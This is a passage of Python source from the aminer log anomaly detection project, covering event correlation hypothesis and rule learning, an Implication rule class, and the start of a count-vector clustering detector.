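                        self.forward_hypotheses_inv[implication.implied_event].remove(implication)
                        if len(self.forward_hypotheses[implication.trigger_event]) == 0:
                            del self.forward_hypotheses[implication.trigger_event]
                        if len(self.forward_hypotheses_inv[implication.implied_event]) == 0:
                            del self.forward_hypotheses_inv[implication.implied_event]
                    self.forward_hypotheses_queue.popleft()
                    continue
                break
            # Trigger implication B <= A when B occurs.
            if log_event in self.back_hypotheses_inv:
                for implication in self.back_hypotheses_inv[log_event]:
                    if implication.stable == 0:
                        implication.hypothesis_trigger_timestamps.append(log_atom.atom_time)
                        self.back_hypotheses_queue.append(implication)
            # Resolve triggered implication B <= A when A occurs.
            if log_event in self.back_hypotheses:
                delete_hypotheses = []
                for implication in self.back_hypotheses[log_event]:
                    if implication.stable == 0:
                        # Find first non-observed trigger timestamp
                        trigger_timestamp_index = -1
                        for trigger_timestamp in implication.hypothesis_trigger_timestamps:
                            trigger_timestamp_index += 1
                            if trigger_timestamp != 'obs':
                                break
                        if trigger_timestamp_index != -1 and \
                                str(implication.hypothesis_trigger_timestamps[trigger_timestamp_index]) != 'obs' and \
                                implication.hypothesis_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - \
                                self.hypothesis_max_delta_time:
                            implication.add_hypothesis_observation(1, log_atom.atom_time)
                            implication.hypothesis_trigger_timestamps[trigger_timestamp_index] = 'obs'
                            # Since only true observations occur here, check for instability not necessary.
                            if implication.compute_hypothesis_stability() == 1:
                                # Update p and min_eval_true according to the results in the sample.
                                p = implication.hypothesis_evaluated_true / implication.hypothesis_observations
                                implication.min_eval_true = self.get_min_eval_true(self.max_observations, p, self.alpha)
                                # Add hypothesis to rules.
                                if implication.trigger_event in self.back_rules:
                                    self.back_rules[implication.trigger_event].append(implication)
                                    self.log_back_rules_learned += 1
                                    self.log_new_back_rules.append(implication)
                                else:
                                    self.back_rules[implication.trigger_event] = [implication]
                                    self.log_back_rules_learned += 1
                                    self.log_new_back_rules.append(implication)
                                if implication.implied_event in self.back_rules_inv:
                                    self.back_rules_inv[implication.implied_event].append(implication)
                                else:
                                    self.back_rules_inv[implication.implied_event] = [implication]
                                # Drop time stamps of previous observations, start new observations for rule.
                                implication.hypothesis_trigger_timestamps.clear()
                                self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1
                                # Remove implication from list of hypotheses.
                                delete_hypotheses.append(implication)
                                self.back_hypotheses_inv[implication.implied_event].remove(implication)
                        else:
                            # A occurred without a recent B: negative evaluation for the hypothesis B <= A.
                            implication.add_hypothesis_observation(0, log_atom.atom_time)
                            if implication.compute_hypothesis_stability() == -1:
                                self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1
                                delete_hypotheses.append(implication)
                                self.back_hypotheses_inv[implication.implied_event].remove(implication)
                                if len(self.back_hypotheses_inv[implication.implied_event]) == 0:
                                    del self.back_hypotheses_inv[implication.implied_event]
                # Deferred removal: the list being iterated above must not be modified in place.
                for delete_hypothesis in delete_hypotheses:
                    self.back_hypotheses[log_event].remove(delete_hypothesis)
                if len(self.back_hypotheses[log_event]) == 0:
                    del self.back_hypotheses[log_event]
            # Clean up triggered/resolved implications.
            while len(self.back_hypotheses_queue) > 0:
                implication = self.back_hypotheses_queue[0]
                if len(implication.hypothesis_trigger_timestamps) == 0:
                    self.back_hypotheses_queue.popleft()
                    continue
                if implication.hypothesis_trigger_timestamps[0] == 'obs':
                    implication.hypothesis_trigger_timestamps.popleft()
                    self.back_hypotheses_queue.popleft()
                    continue
                if implication.hypothesis_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time:
                    implication.hypothesis_trigger_timestamps.popleft()
                    self.back_hypotheses_queue.popleft()
                    continue
                break
            # Generate new hypotheses
            if len(self.hypothesis_candidates) > 0 and random.uniform(0.0, 1.0) < self.generation_factor:
                implication_direction = random.randint(0, 1)
                if self.sum_unstable_unknown_hypotheses >= self.max_hypotheses:
                    # If too many hypotheses exist, do nothing.
                    implication_direction = -1
                if implication_direction == 0:
                    for candidate in self.hypothesis_candidates:
                        candidate_event = candidate[0]
                        # Chronological implication is: candidate_event <= log_event
                        implication = Implication(log_event, candidate_event, log_atom.atom_time, self.max_observations, self.min_eval_true)
                        if log_event in self.back_hypotheses:
                            # Only add hypotheses that are not already present as hypotheses.
                            continue_outer = False
                            for imp in self.back_hypotheses[log_event]:
                                if candidate_event == imp.implied_event:
                                    continue_outer = True
                                    break
                            if continue_outer:
                                continue
                        if log_event in self.back_rules:
                            # Only add hypotheses that are not already present as rules.
                            continue_outer = False
                            for imp in self.back_rules[log_event]:
                                if candidate_event == imp.implied_event:
                                    continue_outer = True
                                    break
                            if continue_outer:
                                continue
                        # At this point it is known that the implication is new, otherwise a continue statement would have been reached
                        if log_event in self.back_hypotheses:
                            self.back_hypotheses[log_event].append(implication)
                        else:
                            self.back_hypotheses[log_event] = [implication]
                        if candidate_event in self.back_hypotheses_inv:
                            self.back_hypotheses_inv[candidate_event].append(implication)
                        else:
                            self.back_hypotheses_inv[candidate_event] = [implication]
                        self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses + 1
                elif implication_direction == 1:
                    for candidate in self.hypothesis_candidates:
                        candidate_event = candidate[0]
                        # Chronological implication is: candidate_event => log_event
                        # Skip event A => event A since already covered by back hypotheses
                        if log_event != candidate_event:
                            implication = Implication(candidate_event, log_event, log_atom.atom_time, self.max_observations,
                                                      self.min_eval_true)
                            if candidate_event in self.forward_hypotheses:
                                # Only add hypotheses that are not already present as hypotheses.
                                continue_outer = False
                                for imp in self.forward_hypotheses[candidate_event]:
                                    if log_event == imp.implied_event:
                                        continue_outer = True
                                        break
                                if continue_outer:
                                    continue
                            if candidate_event in self.forward_rules:
                                # Only add hypotheses that are not already present as rules.
                                continue_outer = False
                                for imp in self.forward_rules[candidate_event]:
                                    if log_event == imp.implied_event:
                                        continue_outer = True
                                        break
                                if continue_outer:
                                    continue
                            # At this point it is known that the implication is new, otherwise a continue statement would have been reached
                            if candidate_event in self.forward_hypotheses:
                                self.forward_hypotheses[candidate_event].append(implication)
                            else:
                                self.forward_hypotheses[candidate_event] = [implication]
                            if log_event in self.forward_hypotheses_inv:
                                self.forward_hypotheses_inv[log_event].append(implication)
                            else:
                                self.forward_hypotheses_inv[log_event] = [implication]
                            self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses + 1
            # NOTE(review): this refresh runs for every atom processed in learn mode, not only when something new was learned;
            # confirm that this matches the documented "no anomaly for that time" semantics of stop_learning_no_anomaly_time.
            if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time
            # Periodically remove old or unstable hypotheses.
            if log_atom.atom_time >= self.last_hypotheses_eval_timestamp + self.hypotheses_eval_delta_time:
                self.last_hypotheses_eval_timestamp = log_atom.atom_time
                empty_back_events = []
                for event in self.back_hypotheses:
                    outdated_hypotheses_indexes = []
                    i = 0
                    for implication in self.back_hypotheses[event]:
                        # Back hypotheses are keyed by their trigger event, so staleness is judged by that event's last occurrence.
                        if implication.stable == 0 and self.last_event_occurrence[
                                event] < log_atom.atom_time - self.delta_time_to_discard_hypothesis:
                            self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1
                            outdated_hypotheses_indexes.append(i)
                            self.back_hypotheses_inv[implication.implied_event].remove(implication)
                            if len(self.back_hypotheses_inv[implication.implied_event]) == 0:
                                del self.back_hypotheses_inv[implication.implied_event]
                        i = i + 1
                    # Reverse list to avoid index changes after deletions.
                    for outdated_hypothesis_index in reversed(outdated_hypotheses_indexes):
                        del self.back_hypotheses[event][outdated_hypothesis_index]
                    if len(self.back_hypotheses[event]) == 0:
                        empty_back_events.append(event)
                for empty_back_event in empty_back_events:
                    del self.back_hypotheses[empty_back_event]
                empty_forward_events = []
                for event in self.forward_hypotheses:
                    outdated_hypotheses_indexes = []
                    i = 0
                    for implication in self.forward_hypotheses[event]:
                        # Forward hypotheses are judged by the time of their most recent evaluation.
                        if implication.stable == 0 and implication.most_recent_observation_timestamp < log_atom.atom_time -\
                                self.delta_time_to_discard_hypothesis:
                            self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1
                            outdated_hypotheses_indexes.append(i)
                            self.forward_hypotheses_inv[implication.implied_event].remove(implication)
                            if len(self.forward_hypotheses_inv[implication.implied_event]) == 0:
                                del self.forward_hypotheses_inv[implication.implied_event]
                        i = i + 1
                    # Reverse list to avoid index changes after deletions.
                    for outdated_hypothesis_index in reversed(outdated_hypotheses_indexes):
                        del self.forward_hypotheses[event][outdated_hypothesis_index]
                    if len(self.forward_hypotheses[event]) == 0:
                        empty_forward_events.append(event)
                for empty_forward_event in empty_forward_events:
                    del self.forward_hypotheses[empty_forward_event]
            # Remove old hypothesis candidates
            while len(self.hypothesis_candidates) > 0:
                candidate = self.hypothesis_candidates[0]
                if candidate[1] < log_atom.atom_time - self.hypothesis_max_delta_time:
                    self.hypothesis_candidates.popleft()
                    continue
                break
            # Add new hypothesis candidates
            if len(self.hypothesis_candidates) < self.candidates_size and random.uniform(0.0, 1.0) < self.generation_probability:
                self.hypothesis_candidates.append((log_event, log_atom.atom_time))
        self.log_success += 1

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.
        @param trigger_time the time the timer fired.
        @return the number of seconds until the next persistence check.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """
        Immediately write persistence data to storage.

        Only rules are persisted (hypotheses are not), as tuples of
        (direction, trigger_event, implied_event, max_observations, min_eval_true); __init__ reads the same layout back.
        """
        known_path_set = set()
        for event_a in self.back_rules:
            for implication in self.back_rules[event_a]:
                known_path_set.add(
                    ('back', tuple(event_a), tuple(implication.implied_event), implication.max_observations, implication.min_eval_true))
        for event_a in self.forward_rules:
            for implication in self.forward_rules[event_a]:
                known_path_set.add(
                    ('forward', tuple(event_a), tuple(implication.implied_event), implication.max_observations, implication.min_eval_true))
        PersistenceUtil.store_json(self.persistence_file_name, list(known_path_set))
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %s new forward rules and %s new back rules in the last 60 "
                "minutes.", component_name, self.log_success, self.log_total, self.log_forward_rules_learned, self.log_back_rules_learned)
        elif AminerConfig.STAT_LEVEL == 2:
            # The last two placeholders list the rules themselves; previously the counters were passed twice, so the
            # learned rules were never printed.
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %s new forward rules and %s new back rules in the last "
                "60 minutes. Following new forward rules were learned: %s. Following new back rules were learned: %s", component_name,
                self.log_success, self.log_total, self.log_forward_rules_learned, self.log_back_rules_learned, self.log_new_forward_rules,
                self.log_new_back_rules)
        self.log_success = 0
        self.log_total = 0
        self.log_forward_rules_learned = 0
        self.log_back_rules_learned = 0
        self.log_new_forward_rules = []
        self.log_new_back_rules = []

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """
        Allowlist an event generated by this source using the information emitted when generating the event.
        @param event_type the event type string the event was emitted with.
        @param event_data the parser path to add to constraint_list.
        @param allowlisting_data must be None; this detector accepts no additional allowlisting data.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        # NOTE(review): receive_atom emits events with type 'analysis.EventCorrelationDetector' (lowercase), while this check
        # expects 'Analysis.<class name>'; as written, events from this detector never pass this comparison. Confirm which
        # spelling is canonical before changing either side.
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = 'Allowlisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f'Allowlisted path {event_data}.'

    def blocklist_event(self, event_type, event_data, blocklisting_data):
        """
        Blocklist an event generated by this source using the information emitted when generating the event.
        @param event_type the event type string the event was emitted with.
        @param event_data the parser path to add to ignore_list.
        @param blocklisting_data must be None; this detector accepts no additional blocklisting data.
        @return a message with information about blocklisting
        @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
        """
        # NOTE(review): same event type spelling mismatch as in allowlist_event.
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if blocklisting_data is not None:
            msg = 'Blocklisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.ignore_list:
            self.ignore_list.append(event_data)
        return f'Blocklisted path {event_data}.'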
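class Implication:
    """
    Define the shape of an implication rule.

    An implication "trigger_event -> implied_event" is first tracked as a hypothesis
    (hypothesis_observations / hypothesis_evaluated_true, capped at max_observations) and, once stable,
    as a rule whose most recent max_observations results are kept in rule_observations.
    """

    def __init__(self, trigger_event, implied_event, generation_time, max_observations, min_eval_true):
        """
        @param trigger_event the event that triggers the implication.
        @param implied_event the event expected to follow the trigger.
        @param generation_time timestamp used as the initial most_recent_observation_timestamp.
        @param max_observations upper bound on counted hypothesis observations and on the rule observation window.
        @param min_eval_true number of true evaluations required for a hypothesis to be considered stable.
        """
        self.trigger_event = trigger_event
        self.implied_event = implied_event
        self.stable = 0  # 0 .. unknown, 1 .. stable, -1 .. unstable
        self.max_observations = max_observations
        self.min_eval_true = min_eval_true
        self.most_recent_observation_timestamp = generation_time
        self.hypothesis_trigger_timestamps = deque([])
        self.rule_trigger_timestamps = deque([])
        self.rule_observations = deque([])
        # Hypothesis is only generated for observed implication. Thus, initialized with 1.
        self.hypothesis_observations = 1
        self.hypothesis_evaluated_true = 1

    def add_hypothesis_observation(self, result, timestamp):
        """
        Update the observation counts for a hypothesis.

        @param result 1 when the implication held, 0 otherwise (added to hypothesis_evaluated_true).
        @param timestamp stored as most_recent_observation_timestamp, even once counting has stopped.
        """
        self.most_recent_observation_timestamp = timestamp
        # Counting stops once max_observations is reached.
        if self.hypothesis_observations < self.max_observations:
            self.hypothesis_observations += 1
            self.hypothesis_evaluated_true += result

    def compute_hypothesis_stability(self):
        """
        Compute the stability of a hypothesis.

        @return 1 when min_eval_true true evaluations were reached, -1 when so many evaluations failed that
        min_eval_true can no longer be reached within max_observations, 0 while undecided. Also stored in self.stable.
        """
        failed = self.hypothesis_observations - self.hypothesis_evaluated_true
        if self.hypothesis_evaluated_true >= self.min_eval_true:
            # Known that hypothesis is stable.
            self.stable = 1
        elif failed > (self.max_observations - self.min_eval_true):
            # Known that hypothesis will never be stable.
            self.stable = -1
        else:
            # Stability is still unknown, more observations required.
            self.stable = 0
        return self.stable

    def add_rule_observation(self, result):
        """Add a rule evaluation result, keeping only the most recent max_observations results."""
        if len(self.rule_observations) >= self.max_observations:
            self.rule_observations.popleft()
        self.rule_observations.append(result)

    def evaluate_rule(self):
        """
        Evaluate a rule.

        @return True when the number of failed observations in the window does not exceed
        max_observations - min_eval_true.
        """
        ones = sum(self.rule_observations)
        return (len(self.rule_observations) - ones) <= (self.max_observations - self.min_eval_true)

    def __repr__(self):
        """Short form '<trigger>-><implied>' (last path component of each) plus hypothesis and rule state."""
        trigger = str(self.trigger_event[-1]).split('/')[-1]
        implied = str(self.implied_event[-1]).split('/')[-1]
        return (trigger + '->' + implied + ', eval=' + str(self.hypothesis_evaluated_true) + '/' +
                str(self.hypothesis_observations) + ', rule=' + str(self.rule_observations) +
                ', ruletriggerts=' + str(self.rule_trigger_timestamps))

    def get_dictionary_repr(self):
        """Return the dictionary representation of an Implication (deques converted to lists)."""
        return {'trigger_event': self.trigger_event, 'implied_event': self.implied_event, 'stable': self.stable,
                'max_observations': self.max_observations, 'min_eval_true': self.min_eval_true,
                'most_recent_observation_timestamp': self.most_recent_observation_timestamp,
                'hypothesis_trigger_timestamps': list(self.hypothesis_trigger_timestamps),
                'rule_trigger_timestamps': list(self.rule_trigger_timestamps),
                'rule_observations': list(self.rule_observations),
                'hypothesis_observations': self.hypothesis_observations,
                'hypothesis_evaluated_true': self.hypothesis_evaluated_true}


def set_random_seed(seed):
    """Set the random seed for testing purposes."""
    random.seed(seed)
EventCountClusterDetector.py000066400000000000000000000523251437606560100364620ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""
This module defines a detector for clustering event and value count vectors.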
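This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import time
import os
import logging
import math
import sys
from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\
    STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class EventCountClusterDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface):
    """
    This class creates events when dissimilar event or value count vectors occur.

    Per id tuple, events are counted within fixed-length time windows; when a window completes, its count vector is
    compared (Manhattan distance, optionally idf-weighted and normalized) against the model of known vectors and an
    anomaly event is generated when no known vector is similar enough.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, window_size=600, id_path_list=None, num_windows=50,
                 confidence_factor=0.33, idf=False, norm=False, add_normal=False, check_empty_windows=True, persistence_id='Default',
                 learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.
        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined
               occurrences. When no paths are specified, the events given by the full path list are analyzed.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param window_size the length of the time window for counting in seconds.
        @param id_path_list parser paths of values for which separate count vectors should be generated.
        @param num_windows the number of vectors stored in the models.
        @param confidence_factor minimum similarity threshold for detection
        @param idf when true, value counts are weighted higher when they occur with fewer id_paths (requires that id_path_list is set).
        @param norm when true, count vectors are normalized so that only relative occurrence frequencies matter for detection.
        @param add_normal when true, count vectors are also added to the model when they exceed the similarity threshold.
        @param check_empty_windows when true, empty count vectors are generated for time windows without event occurrences.
        @param persistence_id name of persistence document.
        @param learn_mode when true, anomalous count vectors (and, with add_normal, normal ones) are added to the model.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are
               omitted. The default value is [] as None is not iterable.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        # NOTE(review): "scoring_path_list" is listed although this constructor has no such parameter; presumably
        # harmless, but confirm against the base class.
        super().__init__(
            mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list", "id_path_list"],
            aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list,
            id_path_list=id_path_list, window_size=window_size, num_windows=num_windows, confidence_factor=confidence_factor,
            persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list,
            constraint_list=constraint_list, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, idf=idf, norm=norm, add_normal=add_normal,
            check_empty_windows=check_empty_windows
        )
        self.next_check_time = {}  # id tuple -> end of the current time window
        self.counts = {}  # id tuple -> {log event: count} of the current window
        self.known_counts = {}  # id tuple -> list (fifo, at most num_windows) of known count vectors
        if self.idf and not self.id_path_list:
            msg = 'Omitting IDF weighting as required id_path_list is not set.'
            logging.getLogger(DEBUG_LOG_NAME).warning(msg)
            print('WARNING: ' + msg, file=sys.stderr)
        self.idf_total = set()  # all id tuples seen, for idf weighting
        self.idf_counts = {}  # log event -> set of id tuples it was seen with
        self.log_windows = 0
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        # Persisted data is a three-element list, mirroring do_persist():
        # 1) known count vectors per id tuple: [[id_tuple, [[[log_event, count], ...], ...]], ...],
        # 2) the id tuples used for idf computation,
        # 3) per log event the id tuples it was observed with: [[log_event, [id_tuple, ...]], ...].
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            for elem in persistence_data[0]:
                window_list = []
                for log_ev_elem_list in elem[1]:
                    elem_dict = {}
                    for log_ev_elem in log_ev_elem_list:
                        elem_dict[tuple(log_ev_elem[0])] = int(log_ev_elem[1])
                    window_list.append(elem_dict)
                self.known_counts[tuple(elem[0])] = window_list
            for elem in persistence_data[1]:
                self.idf_total.add(tuple(elem))
            for elem in persistence_data[2]:
                id_elem_set = set()
                for id_elem in elem[1]:
                    id_elem_set.add(tuple(id_elem))
                self.idf_counts[tuple(elem[0])] = id_elem_set
            logging.getLogger(DEBUG_LOG_NAME).debug('%s loaded persistence data.', self.__class__.__name__)

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source.

        Derives the log event (full path list or target_path_list values) and the id tuple, closes the current
        time window for that id when atom_time has passed it (running detect() on the window's count vector, and on
        an empty vector when windows were skipped and check_empty_windows is set), then counts the event.
        """
        parser_match = log_atom.parser_match
        self.log_total += 1
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        # Skip paths from ignore list.
        for ignore_path in self.ignore_list:
            if ignore_path in parser_match.get_match_dictionary().keys():
                return

        if self.target_path_list is None or len(self.target_path_list) == 0:
            # Event is defined by the full path of log atom.
            constraint_path_flag = False
            for constraint_path in self.constraint_list:
                if parser_match.get_match_dictionary().get(constraint_path) is not None:
                    constraint_path_flag = True
                    break
            if not constraint_path_flag and self.constraint_list != []:
                return
            log_event = tuple(parser_match.get_match_dictionary().keys())
        else:
            # Event is defined by value combos in target_path_list
            values = []
            all_values_none = True
            for path in self.target_path_list:
                match = parser_match.get_match_dictionary().get(path)
                if match is None:
                    continue
                matches = []
                if isinstance(match, list):
                    matches = match
                else:
                    matches.append(match)
                for match in matches:
                    if isinstance(match.match_object, bytes):
                        # Unlike detect(), this decode has no fallback: bytes that are not valid in
                        # AminerConfig.ENCODING raise UnicodeDecodeError out of receive_atom.
                        value = match.match_object.decode(AminerConfig.ENCODING)
                    else:
                        value = str(match.match_object)
                    if value is not None:
                        all_values_none = False
                    values.append(value)
            if all_values_none is True:
                return
            log_event = tuple(values)

        # In case that id_path_list is set, use it to differentiate sequences by their id.
        # Otherwise, the empty tuple () is used as the only key of the counts dicts.
        id_tuple = ()
        for id_path in self.id_path_list:
            id_match = parser_match.get_match_dictionary().get(id_path)
            if id_match is None:
                # allow_missing_id is not set by this constructor; fall back to False (omit the atom)
                # when no base class provides it, instead of failing with AttributeError.
                if getattr(self, 'allow_missing_id', False) is True:
                    # Insert placeholder for id_path that is not available
                    id_tuple += ('',)
                else:
                    # Omit log atom if one of the id paths is not found.
                    return
            else:
                matches = []
                if isinstance(id_match, list):
                    matches = id_match
                else:
                    matches.append(id_match)
                for match in matches:
                    if isinstance(match.match_object, bytes):
                        id_tuple += (match.match_object.decode(AminerConfig.ENCODING),)
                    else:
                        id_tuple += (match.match_object,)

        # Create entry for the id_tuple in the model if it did not occur before.
        if id_tuple not in self.known_counts:
            self.known_counts[id_tuple] = []

        # Update statistics for idf computation
        if self.idf and self.id_path_list:
            self.idf_total.add(id_tuple)
            if log_event in self.idf_counts:
                self.idf_counts[log_event].add(id_tuple)
            else:
                self.idf_counts[log_event] = set([id_tuple])  # skipcq: PTC-W0018

        if id_tuple not in self.next_check_time:
            # First processed log atom, initialize next check time.
            self.next_check_time[id_tuple] = log_atom.atom_time + self.window_size
            self.log_windows += 1
        elif log_atom.atom_time >= self.next_check_time[id_tuple]:
            # Log atom exceeded next check time; time window is complete.
            self.next_check_time[id_tuple] = self.next_check_time[id_tuple] + self.window_size
            self.log_windows += 1
            # Update next_check_time if a time window was skipped
            skipped_windows = 0
            if log_atom.atom_time >= self.next_check_time[id_tuple]:
                skipped_windows = 1 + int((log_atom.atom_time - self.next_check_time[id_tuple]) / self.window_size)
                self.next_check_time[id_tuple] = self.next_check_time[id_tuple] + skipped_windows * self.window_size
                if self.check_empty_windows:
                    self.detect(log_atom, id_tuple, {})  # Empty count vector
            self.detect(log_atom, id_tuple, self.counts[id_tuple])
            # Reset counts vector
            self.counts[id_tuple] = {}

        # Increase count for observed events
        if id_tuple in self.counts:
            if log_event in self.counts[id_tuple]:
                self.counts[id_tuple][log_event] += 1
            else:
                self.counts[id_tuple][log_event] = 1
        else:
            self.counts[id_tuple] = {log_event: 1}
        self.log_success += 1

    def add_to_model(self, id_tuple, count_vector):
        """
        Add a count vector to the model (a fifo list of at most num_windows count vectors).

        Identical vectors are stored only once; when the list is full the oldest vector is dropped.
        """
        if count_vector in self.known_counts[id_tuple]:
            # Avoid that model has identical count vectors multiple times
            return
        if len(self.known_counts[id_tuple]) >= self.num_windows:
            # Drop first (= oldest) count vector
            self.known_counts[id_tuple] = self.known_counts[id_tuple][1:]
        self.known_counts[id_tuple].append(count_vector)

    def detect(self, log_atom, id_tuple, count_vector):
        """
        Create anomaly event when anomaly score is too high.

        A score of -1 from check() means a similar known vector exists (normal); the vector is then added to
        the model only with learn_mode and add_normal. Otherwise it is added when learn_mode is set and an
        'Frequency anomaly detected' event carrying the vector and score is sent to every anomaly event handler.
        """
        score = self.check(id_tuple, count_vector)
        if score == -1:
            # Sample is normal, only add to known values when add_normal is set
            if self.learn_mode and self.add_normal:
                self.add_to_model(id_tuple, count_vector)
            return
        # Sample is anomalous, add to model when training and create event
        if self.learn_mode:
            self.add_to_model(id_tuple, count_vector)
        try:
            data = log_atom.raw_data.decode(AminerConfig.ENCODING)
        except UnicodeError:
            data = repr(log_atom.raw_data)
        if self.output_logline:
            original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
            sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data]
        else:
            sorted_log_lines = [data]
        analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': list(count_vector.keys()),
                              'AffectedLogAtomFrequencies': list(count_vector.values())}
        if self.id_path_list is not None:
            analysis_component['AffectedIdValues'] = list(id_tuple)
        count_info = {'ConfidenceFactor': self.confidence_factor, 'Confidence': score}
        event_data = {'AnalysisComponent': analysis_component, 'CountData': count_info}
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Frequency anomaly detected', sorted_log_lines, event_data,
                                   log_atom, self)

    def check(self, id_tuple, count_vector):
        """
        Compute the normalized Manhattan distance between count_vector and each count vector in the model.

        @return -1 as soon as one known vector scores at or below confidence_factor (remaining vectors are not
        checked, so the true minimum is unknown), otherwise the minimum score over the model, at most 1.
        """
        min_score = 1
        use_idf = self.idf and self.id_path_list
        # Normalization sums do not depend on the element, so compute them once per vector.
        norm_sum_count = sum(count_vector.values()) if self.norm else 1
        for known_count in self.known_counts[id_tuple]:
            # Iterate over all count vectors in the model
            norm_sum_known = sum(known_count.values()) if self.norm else 1
            manh = 0
            manh_max = 0
            for element in set(list(known_count.keys()) + list(count_vector.keys())):
                # Iterate over each val that occurs in one of the vectors
                idf_fact = 1
                if use_idf:
                    # Compute idf (weight rare value higher than ones that occur with many id_values)
                    # NOTE(review): raises KeyError if a persisted known_count holds an event that idf_counts never
                    # saw (e.g. idf enabled after the model was persisted) -- confirm whether that can happen.
                    idf_fact = math.log10((1 + len(self.idf_total)) / len(self.idf_counts[element]))
                if element not in known_count:
                    weighted = count_vector[element] * idf_fact / norm_sum_count
                    manh += weighted
                    manh_max += weighted
                elif element not in count_vector:
                    weighted = known_count[element] * idf_fact / norm_sum_known
                    manh += weighted
                    manh_max += weighted
                else:
                    weighted_count = count_vector[element] * idf_fact / norm_sum_count
                    weighted_known = known_count[element] * idf_fact / norm_sum_known
                    manh += abs(weighted_count - weighted_known)
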